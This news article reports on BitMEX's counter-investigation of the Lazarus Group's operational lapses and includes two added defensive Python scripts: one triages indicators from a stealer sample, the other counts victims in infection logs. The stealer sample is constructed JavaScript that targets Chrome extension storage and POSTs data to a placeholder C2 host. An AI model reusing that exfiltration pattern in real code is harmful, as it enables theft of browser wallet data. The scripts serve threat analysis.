In a stunning twist, cryptocurrency exchange BitMEX just exposed major security mistakes by the notorious Lazarus Group. This North Korean hacking team, linked to billion-dollar crypto heists, made surprisingly amateur errors. BitMEX researchers found critical flaws during a recent investigation. Their probe revealed exposed IP addresses and an unprotected database. These lapses offer rare insight into the group’s secretive operations.
Database Door Left Open
The discovery started with a failed attack. A Lazarus operative messaged a BitMEX employee on LinkedIn. Posing as a collaborator, the hacker proposed a fake NFT marketplace project. Fortunately, the employee recognised this classic Lazarus phishing tactic. Consequently, the employee immediately alerted BitMEX security. This triggered a full counter-operations investigation into the hackers’ methods. Investigators analysed malicious code shared by the hacker.
Significantly, they found it connected to an unsecured Supabase database instance. Lazarus used this platform for managing attack data. The database required no authentication whatsoever. BitMEX accessed it freely, uncovering 37 logs of infected machines. Each log contained usernames, hostnames, OS details, and IP addresses. Geolocations and timestamps were also exposed. Patterns suggested at least 10 accounts were likely developer or test machines.
Hacker’s Home Address Accidentally Revealed
One lapse proved particularly damaging. A hacker named “Victor” forgot basic operational security. He failed to use a VPN during his activities. As a result, his real residential IP address leaked: 223.104.144.97. This traced directly to Jiaxing, China, under China Mobile. This was a huge mistake for the secretive group. Normally, Lazarus operatives carefully routed traffic through VPNs like Touch VPN and Astrill VPN.
The investigation exposed more carelessness. Lazarus reused code from known “BeaverTail” malware. Palo Alto’s Unit 42 previously documented this tool. It steals credentials and logs victim data. However, Lazarus implemented it poorly. BitMEX easily disassembled the JavaScript using Webcrack. This revealed identifiers for Chrome extensions. It also exposed connections to a malicious URL.
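The report describes pulling Chrome extension identifiers and a malicious URL out of the deobfuscated stealer code. The script below is an added illustration of that triage step, not code from BitMEX or from the BeaverTail sample; it runs over a constructed JavaScript snippet and relies only on the fact that Chrome extension IDs are 32 characters drawn from the letters a–p. The extension IDs, hostnames and paths in the sample are invented placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the style of a deobfuscated browser-credential stealer.
# Nothing here is taken from the real malware; IDs and hosts are placeholders.
SAMPLE_JS = r"""
const exts = ["abcdefghijklmnopabcdefghijklmnop", "ponmlkjihgfedcbaponmlkjihgfedcba"];
const base = home + "/Library/Application Support/Google/Chrome/Default/Local Extension Settings/";
const target = base + exts[0];
fetch("http://c2.example.invalid/upload", {method: "POST", body: data});
fetch("https://api.example.invalid/keys");
const notExt = "zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"; // 32 chars but outside a-p: not an extension id
"""

# Chrome extension IDs are exactly 32 characters from a-p; the lookarounds stop
# the pattern from matching inside a longer run of letters.
EXT_ID_RE = re.compile(r"(?<![a-p])[a-p]{32}(?![a-p])")
# Crude URL literal matcher: stops at whitespace, quotes, backticks and brackets.
URL_RE = re.compile(r"""https?://[^\s"'`)<>]+""")


def extract_extension_ids(js: str) -> list[str]:
    """Return the distinct Chrome extension IDs referenced in the source."""
    return sorted(set(EXT_ID_RE.findall(js)))


def extract_urls(js: str) -> list[str]:
    """Return the distinct URL literals found in the source."""
    return sorted(set(URL_RE.findall(js)))


def extract_hosts(js: str) -> list[str]:
    """Reduce the URLs to hostnames, which is what a blocklist or DNS log search needs."""
    return sorted({urlparse(u).hostname for u in extract_urls(js) if urlparse(u).hostname})


def triage(js: str) -> dict:
    """Summarise the indicators an analyst would pull out of a deobfuscated stealer."""
    return {
        "extension_ids": extract_extension_ids(js),
        "urls": extract_urls(js),
        "hosts": extract_hosts(js),
        "targets_chrome_extension_storage": "Local Extension Settings" in js,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

The extension IDs are the useful output: they name the browser extensions (typically wallets) whose local storage the stealer reads, so a defender can check whether any of them are deployed in the organisation. The hostnames feed straight into DNS and proxy log searches.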
BitMEX’s report highlighted a clear asymmetry within Lazarus. “Frontline” teams conduct low-skill social engineering, like phishing on LinkedIn. Meanwhile, advanced developers craft sophisticated malware and exploits. This suggests the group operates in fragmented sub-teams. Less skilled members handle initial victim targeting and engagement. Experts then take over after gaining access. Such structure creates potential security gaps between teams.
Global Alerts
These findings amplify worldwide concern. Government agencies worldwide are actively probing DPRK-linked hackers. In September 2024, the FBI specifically warned about Lazarus social engineering scams. These included phishing using fake crypto job offers. Then, in January 2025, Japan, the US, and South Korea echoed this warning. They labelled Lazarus activity a direct threat to the financial system. Furthermore, Bloomberg reports suggest G7 leaders will discuss countering Lazarus at their next summit.
Capitalising on the exposed database, BitMEX built a monitoring program. This tool tracks new infections logging data into the Supabase instance. Since March 31, 2025, it recorded 856 entries. These involved 174 unique user/hostname combinations. The exchange also established an internal system. This proactively detects future Lazarus attacks and their operational errors. However, BitMEX focused on new discoveries. They deliberately avoided re-analysing the known BeaverTail malware component.
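The monitoring program described above reduces a stream of infection-log entries to unique user/hostname pairs and flags likely developer or test machines. The script below is an added example of that kind of reduction; it is not BitMEX's tool, the records are constructed, and the name-based heuristic for spotting test machines is an assumption of this example, since the page does not say which patterns BitMEX used.

```python
import json
from collections import Counter

# Constructed infection-log records in the shape the article describes
# (username, hostname, OS, IP, geolocation, timestamp). None are real victims.
RAW_LOG = """
{"username": "alice", "hostname": "alice-mbp", "os": "macOS 14.4", "ip": "203.0.113.10", "geo": "GB", "ts": "2025-04-01T09:12:00Z"}
{"username": "alice", "hostname": "alice-mbp", "os": "macOS 14.4", "ip": "203.0.113.10", "geo": "GB", "ts": "2025-04-02T08:41:00Z"}
{"username": "dev", "hostname": "test-vm-01", "os": "Windows 10", "ip": "198.51.100.7", "geo": "KR", "ts": "2025-04-01T03:05:00Z"}
{"username": "bob", "hostname": "DESKTOP-7Q2", "os": "Windows 11", "ip": "192.0.2.44", "geo": "US", "ts": "2025-04-03T17:20:00Z"}
{"username": "tester", "hostname": "sandbox", "os": "Ubuntu 22.04", "ip": "198.51.100.9", "geo": "KR", "ts": "2025-04-01T03:07:00Z"}
"""

# Assumed heuristic: names that suggest the attacker's own lab rather than a victim.
TEST_MARKERS = ("test", "dev", "sandbox", "vm", "qa")


def parse_records(raw: str) -> list[dict]:
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in raw.splitlines() if line.strip()]


def victim_key(rec: dict) -> tuple[str, str]:
    """A victim is identified by the user/hostname pair, as in the report."""
    return (rec["username"], rec["hostname"])


def unique_victims(records: list[dict]) -> dict[tuple[str, str], dict]:
    """Collapse repeated check-ins to one entry per victim with first seen and count."""
    seen: dict[tuple[str, str], dict] = {}
    for rec in sorted(records, key=lambda r: r["ts"]):
        key = victim_key(rec)
        if key not in seen:
            seen[key] = {"first_seen": rec["ts"], "os": rec["os"], "geo": rec["geo"], "entries": 0}
        seen[key]["entries"] += 1
    return seen


def looks_like_test_machine(key: tuple[str, str]) -> bool:
    """Flag user/hostname pairs whose names match the assumed lab markers."""
    name = " ".join(key).lower()
    return any(marker in name for marker in TEST_MARKERS)


def summarise(raw: str) -> dict:
    """Totals an analyst would report: entries, unique victims, likely test machines."""
    records = parse_records(raw)
    victims = unique_victims(records)
    test_keys = [k for k in victims if looks_like_test_machine(k)]
    return {
        "entries": len(records),
        "unique_victims": len(victims),
        "likely_test_machines": sorted(test_keys),
        "by_geo": dict(Counter(v["geo"] for v in victims.values())),
    }


if __name__ == "__main__":
    print(json.dumps(summarise(RAW_LOG), indent=2))
```

Separating probable lab machines from real victims matters because the attacker's own test hosts would otherwise inflate the victim count and contaminate any geolocation picture drawn from the log.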
Why These Lapses Matter
Lazarus Group remains a top crypto threat, tied to North Korea’s cyber warfare. Chainalysis attributes $1.34 billion in 2024 crypto thefts to them across 47 incidents. Their attacks often start with social engineering. For instance, a phishing trick enabled February 2025’s massive $1.4 billion Bybit hack.
BitMEX’s findings reveal a jarring mix of sophistication and stunningly basic errors. The exposed China IP raises location questions, though its meaning is unclear. Similarly, the unsecured Supabase shows reliance on modern tools but poor configuration. Ultimately, these holes offer ways to potentially disrupt the group.
Evolving Threat
Despite these setbacks, Lazarus remains extremely dangerous. BitMEX stresses that its success came from exposing less sophisticated “second-string” hackers. The group’s elite core likely remains highly capable. The exposed IP and database don’t fully identify Lazarus members. Their anonymity largely persists. Nevertheless, the crypto community must stay vigilant. BitMEX urges continuous monitoring and robust security protocols against such persistent threats. Global powers are now mobilising, recognising Lazarus as a critical security challenge.
Written By Fazal Ul Vahab C H